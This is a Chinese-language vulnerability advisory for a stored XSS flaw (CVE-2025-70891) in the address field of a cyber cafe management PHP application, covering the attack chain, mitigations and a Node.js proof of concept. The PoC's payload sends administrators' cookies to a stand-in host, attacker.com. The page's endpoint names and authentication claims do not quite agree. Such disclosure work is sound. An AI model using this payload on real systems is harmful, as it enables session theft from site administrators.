CVE-2025-70891 Phpgurukul Cyber Cafe Management System v1.0 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-70891

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Phpgurukul Cyber Cafe Management System v1.0

漏洞概述

CVE-2025-70891是Phpgurukul Cyber Cafe Management System v1.0中存在的一个存储型跨站脚本(XSS)漏洞。该漏洞位于用户管理模块的add-users.php端点，应用程序对通过uadd参数提交的用户输入没有进行充分的过滤和编码。攻击者无需特殊权限即可利用此漏洞，在用户数据库中持久存储恶意JavaScript代码。当具有更高权限的用户（如管理员）访问view-allusers.php页面并点击View按钮查看用户信息时，存储的恶意脚本会被执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重后果。由于该漏洞属于存储型XSS，恶意Payload会永久存在于数据库中，影响所有访问该页面的用户，具有较高的危害性。CVSS 3.1评分为6.1，属于中等严重程度。

技术细节

该存储型XSS漏洞的根本原因是应用程序在处理用户输入时缺乏输入验证和输出编码。在add-users.php文件中，攻击者可以通过uadd参数注入任意JavaScript代码，例如：<script>alert(document.cookie)</script>。由于应用程序直接将该输入存储到数据库而未进行任何过滤或转义，当数据被检索并在view-allusers.php页面的View功能中展示时，恶意代码会在受害者浏览器中执行。攻击利用条件包括：1) 攻击者需要能够访问add-users.php端点（可能需要低权限认证）；2) 需要诱导具有更高权限的用户访问包含恶意Payload的页面并触发查看操作。攻击成功后，攻击者可以窃取受害者的会话Cookie、冒充用户进行操作或修改页面内容。该漏洞影响Web应用程序的用户管理模块，攻击向量为网络，复杂度低，但需要用户交互才能触发。

攻击链分析

STEP 1

步骤1

攻击者登录系统并访问add-users.php用户注册页面

STEP 2

步骤2

攻击者在uadd参数（地址字段）中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>

STEP 3

步骤3

应用程序将攻击者输入直接存储到数据库，未进行输入验证或输出编码

STEP 4

步骤4

具有管理权限的用户（如管理员）访问view-allusers.php页面查看所有用户

STEP 5

步骤5

管理员点击View按钮查看攻击者创建的用户时，存储的恶意脚本在管理员浏览器中执行

STEP 6

步骤6

攻击者通过执行的JavaScript窃取管理员的会话Cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-70891 Stored XSS PoC // Target: Phpgurukul Cyber Cafe Management System v1.0 // Endpoint: add-users.php (uadd parameter) const axios = require('axios'); const qs = require('querystring'); async function exploit(targetUrl, sessionCookie) { const addUserEndpoint = `${targetUrl}/admin/user-register.php`; const viewUsersEndpoint = `${targetUrl}/admin/view-allusers.php`; // Malicious XSS payload const xssPayload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'; // Step 1: Add user with XSS payload in uadd parameter const addUserData = { username: 'testuser' + Date.now(), email: '[email protected]', mobile: '1234567890', uadd: xssPayload, // XSS injection point password: 'password123', submit: 'submit' }; try { // Send request to add user with malicious address await axios.post(addUserEndpoint, qs.stringify(addUserData), { headers: { 'Cookie': sessionCookie, 'Content-Type': 'application/x-www-form-urlencoded' } }); console.log('[+] User added with XSS payload'); console.log('[+] Payload stored in database'); console.log('[+] Waiting for admin to view user list...'); // Step 2: When admin visits view-allusers.php and clicks View, // the XSS payload will be executed } catch (error) { console.error('[-] Exploitation failed:', error.message); } } // Usage // exploit('http://target.com', 'PHPSESSID=your_session_cookie'); // Manual PoC: // 1. Login to the application // 2. Navigate to user registration (add-users.php) // 3. Enter XSS payload in address field (uadd parameter): <script>alert(document.cookie)</script> // 4. Submit the form // 5. When admin views user list and clicks View, XSS executes

影响范围

Phpgurukul Cyber Cafe Management System v1.0

防御指南

临时缓解措施

在修复前，可采取以下临时缓解措施：1) 限制用户注册功能的访问权限，仅允许受信任的管理员操作；2) 在Web服务器层面配置输入过滤规则，拦截包含<script>等危险标签的请求；3) 部署Web应用防火墙(WAF)规则检测XSS特征；4) 提醒管理员不要点击可疑的用户查看链接；5) 定期检查数据库中是否存在恶意脚本代码并清除。